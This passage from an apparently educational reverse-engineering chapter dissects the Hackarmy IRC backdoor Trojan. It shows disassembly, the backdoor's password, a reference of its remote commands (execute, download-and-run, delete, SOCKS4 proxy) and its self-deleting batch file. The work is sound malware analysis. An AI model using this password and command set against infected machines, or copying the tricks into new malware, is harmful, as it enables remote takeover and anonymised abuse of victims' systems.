00402F0E  CMP EDI,3
00402F11  JLE SHORT ZoneLock.00402EEF

The preceding sequence is important: it compares the string at [EBP-60], which is the nickname of the user who sent the current private message (essentially the attacker), with a string from a global variable. It also looks as if this global variable is an array of four strings (the loop runs with EDI going from 0 through 3), each element occupying 0x50 (80 in decimal) bytes. While I was first stepping through this sequence, all four of these strings were empty. Because nothing matched, the program proceeded to the code sequence that follows instead of calling into a longish function at 00403016, which is called only when one of the usernames matches. Let's look at what the function does next (when the usernames don't match).

00402F29  PUSH ZoneLock.004050BE       ; <%s> = "tounge"
00402F2E  PUSH ZoneLock.00405110       ; <%s> = "morris"
00402F33  PUSH ZoneLock.004054A1       ; format = "%s %s"
00402F38  LEA EAX,DWORD PTR SS:[EBP-260]
00402F3E  PUSH EAX                     ; s
00402F3F  CALL <JMP.&CRTDLL.sprintf>
00402F44  LEA EAX,DWORD PTR SS:[EBP-260]
00402F4A  PUSH EAX                     ; s2
00402F4B  PUSH ESI                     ; s1
00402F4C  CALL <JMP.&CRTDLL.strcmp>

This is an interesting sequence. The first part uses sprintf to produce the string morris tounge, which is then compared with the current message being processed. If there is a mismatch, the function performs one more check on the current command string (even though it's been confirmed to be PRIVMSG), and returns. If the current message is "!morris tounge", the program stores the originating username in the next available slot of the string array at 004051C5. That is, upon receiving this Morris message, the program stores the name of the user it's currently talking to in the same array that was scanned for the attacker's name earlier. What does this tell you? It looks like the string !morris tounge is the secret password for the backdoor program. It will only start processing commands from a user that has transmitted this particular message!
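The login logic described so far can be summarized in a few lines of high-level code. The following Python sketch is only a model of the behavior observed in the disassembly, not the program's actual source: the class and method names are invented, the sender's nickname is assumed to have been parsed elsewhere (as it is at [EBP-60]), and what happens when all four slots are taken is a guess.

```python
# Hypothetical model of the login check; all names are invented for illustration.
MAX_OPERATORS = 4                           # the loop at 00402EEF runs for EDI = 0..3
COMMAND_PREFIX = "!"                        # the character stored at 004050C5
PASSWORD = "%s %s" % ("morris", "tounge")   # assembled at run time, like the sprintf call


class LoginModel:
    def __init__(self):
        # Models the string array at 004051C5; empty strings are free slots.
        self.operators = [""] * MAX_OPERATORS

    def handle_privmsg(self, sender, line):
        """Classify one PRIVMSG line as 'ignored', 'registered', or 'command'."""
        marker = line.find(" :", 1)         # mirrors strstr(line + 1, " :")
        if marker == -1:
            return "ignored"
        message = line[marker + 2:]         # skip the " :" separator
        if not message.startswith(COMMAND_PREFIX):
            return "ignored"
        if sender in self.operators:        # the strcmp loop over the four slots
            return "command"                # would be handed to the routine at 00403016
        if message == COMMAND_PREFIX + PASSWORD:
            for slot, name in enumerate(self.operators):
                if name == "":
                    self.operators[slot] = sender
                    return "registered"
        return "ignored"                    # assumption: a full table is silently ignored


model = LoginModel()
line = ":attacker!u@host PRIVMSG ##g## :!info"
print(model.handle_privmsg("attacker", line))   # not yet logged in
print(model.handle_privmsg("attacker", ":attacker!u@host PRIVMSG ##g## :!morris tounge"))
print(model.handle_privmsg("attacker", line))   # now treated as a command
```

The point of the model is the ordering: a command is honored only if its sender already occupies a slot, and the only way into a slot is to send the password message first.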

One unusual thing about the preceding code snippet, which generates and checks the password, is that the sprintf call seems to be redundant. Why not just call strcmp with a pointer to the full morris tounge string? Why construct it at runtime if it's a predefined, hard-coded string? A quick search for other references to these addresses shows that the strings are static; there doesn't seem to be any other place in the code that modifies them in any way. Therefore, the only reason I can think of is that the author of this program didn't want the string "morris tounge" to actually appear in the program in one piece. If you look at the code snippet, you'll see that each of the words comes from a different area in the program's data section. This is essentially a primitive antireversing scheme that's supposed to make it a bit more difficult to find the password string when searching through the program binary.
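To see why splitting the password defeats a naive string search, consider the following Python sketch. The byte layout is invented for illustration and does not reproduce the real data section; only the two words and the "%s %s" format come from the listing.

```python
# Hypothetical data-section contents; offsets and filler bytes are invented.
data_section = (
    b"\x00" * 8
    + b"tounge\x00"          # one fragment of the password
    + b"\x00" * 32           # unrelated data between the fragments
    + b"morris\x00"          # the other fragment
    + b"%s %s\x00"           # the format string that joins them
)


def contains(blob, text):
    """Return True if the ASCII string appears contiguously in the blob."""
    return text.encode("ascii") in blob


# The complete password exists only after the program formats it at run time.
password = "%s %s" % ("morris", "tounge")

print(contains(data_section, password))   # False: never stored in one piece
print(contains(data_section, "morris"))   # True
print(contains(data_section, "tounge"))   # True
```

A search for the complete password comes up empty, while each fragment is trivially visible, which is why following the code that consumes the strings is more reliable than scanning the binary for them.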

Now that you have the password, you can type it into your IRC program and try to establish a real communications channel with the backdoor. Obtaining a basic list of supported commands is going to be quite easy. I've already mentioned a routine at 00403016 that appears to process the supported commands. Disassembling this function to figure out the supported commands is an almost trivial task; one merely has to look for calls to string-comparison functions and examine the strings being compared. The function that does this is far too long to be included here, but let's take a look at a typical sequence that checks the incoming message.

0040308B  PUSH ZoneLock.0040511B       ; s2 = "?dontuseme"
00403090  LEA EAX,DWORD PTR SS:[EBP-200]
00403096  PUSH EAX                     ; s1
00403097  CALL <JMP.&CRTDLL.strcmp>
0040309C  ADD ESP,8
0040309F  OR EAX,EAX
004030A1  JNZ SHORT ZoneLock.004030B2
004030A3  CALL ZoneLock.00401AA0
004030A8  MOV EAX,3
004030AD  JMP ZoneLock.00403640
004030B2  PUSH ZoneLock.00405126       ; s2 = "?quit"
004030B7  LEA EAX,DWORD PTR SS:[EBP-200]
004030BD  PUSH EAX                     ; s1
004030BE  CALL <JMP.&CRTDLL.strcmp>
004030C3  ADD ESP,8
004030C6  OR EAX,EAX
004030C8  JNZ SHORT ZoneLock.004030D4
004030CA  MOV EAX,3
004030CF  JMP ZoneLock.00403640
004030D4  PUSH ZoneLock.00405138       ; s2 = "threads"
004030D9  LEA EAX,DWORD PTR SS:[EBP-200]
004030DF  PUSH EAX                     ; s1
004030E0  CALL <JMP.&CRTDLL.strcmp>

See my point? All three strings are compared against the string from [EBP-200]; that's the command string (not including the exclamation mark). There are quite a few string comparisons, and I won't go over the code that responds to each and every one of them. Instead, how about we try out a few of the more obvious ones and just see what happens? For instance, let's start with the !info command.

/JOIN ##g##
<attacker> !morris tounge
<attacker> !info
-iyljuhn- Windows 2000 [Service Pack 4]. uptime: 0d 18h 11m.
  cpu 1648MHz. online: 0d 0h 0m. Current user: eldade.
  IP:192.168.11.128 Hostname:eldad-vm-2ksrv. Processor x86
  Family 6 Model 9 Stepping 8, GenuineIntel.

You start out by joining the ##g## channel and saying the password. You then send the "!info" command, to which the program responds with some general information regarding the infected host. This includes the exact version of the running operating system (in my case, this was the version of the guest operating system running under VMware, on which I installed the Trojan/backdoor), and other details such as estimated CPU speed and model number, IP address and system name, and so on.

There are plenty of other, far more interesting commands. For example, take a look at the "!webfind64" and the "!execute" commands. "!execute" launches an executable from the infected host's local drives. "!webfind64" downloads a file from any remote server into a local directory and launches it if needed. Together, these two commands give an attacker full-blown access to the infected system, and can be used to take advantage of it in countless ways.
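Stepping back, the chain of strcmp calls in the routine at 00403016 behaves like a simple lookup table. The Python sketch below models that idea. The command strings are the ones seen in the listings and in the IRC session, but the handler labels are invented, and the way the command word is separated from its argument is an assumption, because that part of the code isn't shown here.

```python
# Command strings as compared in the routine at 00403016 (without the "!").
# The labels on the right are invented names, not symbols from the binary.
COMMANDS = [
    ("?dontuseme", "self_destruct"),
    ("?quit", "quit"),
    ("threads", "list_threads"),
    ("info", "report_host_info"),
    ("socks4", "start_socks4_thread"),
]


def dispatch(message):
    """Map a private message to (handler label, argument), or None."""
    if not message.startswith("!"):
        return None
    # Assumption: the first space-delimited word is the command.
    word, _, argument = message[1:].partition(" ")
    for name, handler in COMMANDS:      # sequential comparison, like the strcmp chain
        if word == name:
            return handler, argument
    return None


print(dispatch("!socks4 1080"))
print(dispatch("!bogus"))
```

When cataloging commands during analysis, a table like this is a convenient place to record each string alongside the address of the code that handles it.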

Running SOCKS4 Servers

There is one other significant command in the backdoor program that I haven't discussed yet: "!socks4". This command establishes a thread that waits for connections that use the SOCKS4 protocol. SOCKS4 is a well-known proxy communications protocol that can be used for indirectly accessing a network. Using SOCKS4, it is possible to route all traffic (for example, outgoing Internet traffic) through a single server.

The backdoor supports multiple SOCKS4 threads that listen to any traffic on attacker-supplied port numbers. What does this all mean? It means that if the infected system has any open ports on the Internet, it is possible to install a SOCKS4 server on one of those ports, and use that system to indirectly connect to the Internet. For attackers this can be heaven, because it allows them to anonymously connect to servers on the Internet (actually, it's not anonymous—it uses the legitimate system owner's identity, so it is essentially a type of identity theft). Such anonymous connections can be used for any purpose: Web browsing, e-mail, and so on. The ability to connect to other servers anonymously without exposing one's true identity creates endless criminal opportunities—it is going to be extremely difficult to trace back the actual system from which the traffic is originating. This is especially true if each individual proxy is only used for a brief period of time and if each proxy is cleaned up properly once it is decommissioned.
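When examining captured traffic from an infected host, it helps to be able to recognize a SOCKS4 request. The following Python sketch parses one according to the publicly documented SOCKS4 message layout (a version byte, a command byte, a 2-byte port, a 4-byte IPv4 address, and a NUL-terminated user ID). It is not derived from the backdoor's code, and the function names are invented.

```python
import socket
import struct


def parse_socks4_request(data):
    """Parse a SOCKS4 request into (command, host, port, user_id)."""
    if len(data) < 9:
        raise ValueError("request too short")
    # Network byte order: version, command, destination port, destination IPv4.
    version, command, port, raw_ip = struct.unpack("!BBH4s", data[:8])
    if version != 4:
        raise ValueError("not a SOCKS4 request")
    end = data.find(b"\x00", 8)
    if end == -1:
        raise ValueError("user ID is not NUL-terminated")
    user_id = data[8:end].decode("ascii", "replace")
    return command, socket.inet_ntoa(raw_ip), port, user_id


def build_socks4_reply(granted):
    """Build the 8-byte reply: version 0, status 90 (granted) or 91 (rejected)."""
    return struct.pack("!BBH4s", 0, 90 if granted else 91, 0, b"\x00" * 4)


# A CONNECT request (command 1) to port 80 on an example address.
request = struct.pack("!BBH4s", 4, 1, 80, socket.inet_aton("192.168.11.128")) + b"user\x00"
print(parse_socks4_request(request))
```

Because the request carries the real destination address and port, a single logged packet is enough to show where the proxied connection was headed.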

Clearing the Crime Scene

Speaking of cleaning up, this program supports a self-destruct command called "!?dontuseme", which uninstalls the program from the registry and deletes the executable. You can probably guess that this is not an entirely trivial task, because an executable program file cannot be deleted while the program is running. In order to work around this problem, the program must generate a "self-destruct" batch file, which deletes the program's executable after the main program exits. This is done in a little function at 00401AA0, which generates the following batch file, called "rm.bat". The program runs this batch file and quits. Let's take a quick look at this batch file.

@echo off
:start
if not exist "C:\WINNT\SYSTEM32\ZoneLockup.exe" goto done
del "C:\WINNT\SYSTEM32\ZoneLockup.exe"
goto start
:done
del rm.bat

This batch file loops through code that attempts to delete the main program executable. The loop is only terminated once the executable is actually gone. That's because the batch file is going to start running while the ZoneLockup.exe executable is still running. The batch file must wait until ZoneLockup.exe is no longer running so that it can be deleted.
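The control flow of the batch file can be modeled with a short simulation. The Python sketch below touches no files; it only counts how many delete attempts the loop makes before the executable is released. The locked_attempts parameter is an invented stand-in for the time the process takes to exit, and the max_attempts guard is an addition that the real batch file does not have.

```python
def run_cleanup_loop(locked_attempts, max_attempts=100):
    """Simulate rm.bat and return the number of delete attempts made.

    locked_attempts is the number of attempts that fail because the
    executable is still running (hypothetical, for illustration).
    """
    exists = True
    attempts = 0
    while exists:                           # "if not exist ... goto done"
        if attempts >= max_attempts:        # safety guard, not in the original
            raise RuntimeError("file never became deletable")
        attempts += 1                       # "del ..."
        if attempts > locked_attempts:
            exists = False                  # the delete finally succeeds
        # "goto start"
    return attempts


print(run_cleanup_loop(0))   # file already unlocked: one attempt
print(run_cleanup_loop(3))   # three failed attempts, then success
```

The simulation makes the busy-wait nature of the script visible: without a delay between iterations, the loop simply spins until the operating system releases the file.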

The Hackarmy Backdoor: A Command Reference

Having gathered all of this information, I realized that it would be a waste to not properly summarize it. This is an interesting program that reveals much about how modern-day malware works. The following table provides a listing of the supported commands I was able to find in the program along with their descriptions.

Table 8.1. List of supported commands in the Hackarmy Trojan/Backdoor program.

COMMAND	DESCRIPTION	ARGUMENTS
`!?dontuseme`	Instructs the program to self-destruct by removing its `Autorun` registry entry and deleting its executable.
`!socks4`	Initializes a SOCKS4 server thread on the specified port. This essentially turns the infected system into a proxy server.	Port number to open.
`!threads`	Lists the currently active server threads.
`!info`	Displays some generic information regarding the infected host, including its name, IP address, CPU model and speed, currently logged on username, and so on.
`!?quit`	Closes the backdoor process without uninstalling the program. It will be started again the next time the system boots.
`!?disconnect`	Causes the program to disconnect from the IRC server and wait for the specified number of minutes before attempting to reconnect.	Number of minutes to wait before attempting reconnection.
`!execute`	Executes a local binary. The program is launched in a hidden mode to keep the end user out of the loop...	Full path to executable file.
`!delete`	Deletes a file from the infected host. The program responds with a message notifying the attacker whether or not the operation was successful.	Full path to file being deleted.
`!webfind64`	Instructs the infected host to download a file from a remote server (using a specified protocol such as `http://`, `ftp://`, and so on).	URL of file being downloaded and local file name that will receive the downloaded file.
`!killprocess`, `!listprocesses`	The strings for these two commands appear in the executable, and there is a function (at `0040239A`) that appears to implement both commands, but it is unreachable. A future feature perhaps?

Conclusion

Malicious programs can be treacherous and complicated. They will do their best to be invisible and seem as innocent as possible. Educating end users on how these programs work and what to watch out for is critical, but it's not enough. Developers of applications and operating systems must constantly improve the way these programs handle untrusted code and convincingly convey to the users the fact that they simply shouldn't let an unknown program run on their system unless there's an excellent reason to do so.

In this chapter, you have learned a bit about malicious programs, how they work, and how they hide themselves from antivirus scanners. You also dissected a very typical real-world malicious program and analyzed its behavior, to gain a general idea of how these programs operate and what type of damage they inflict on infected systems.

Granted, most people wouldn't ever need to actually reverse engineer a malicious program. The developers of antivirus and other security software do an excellent job, and all that is necessary is to install the right security products and properly configure systems and networks for maximum security. Still, reversing malware can be seen as an excellent exercise in reverse engineering and as a solid introduction to malicious software.
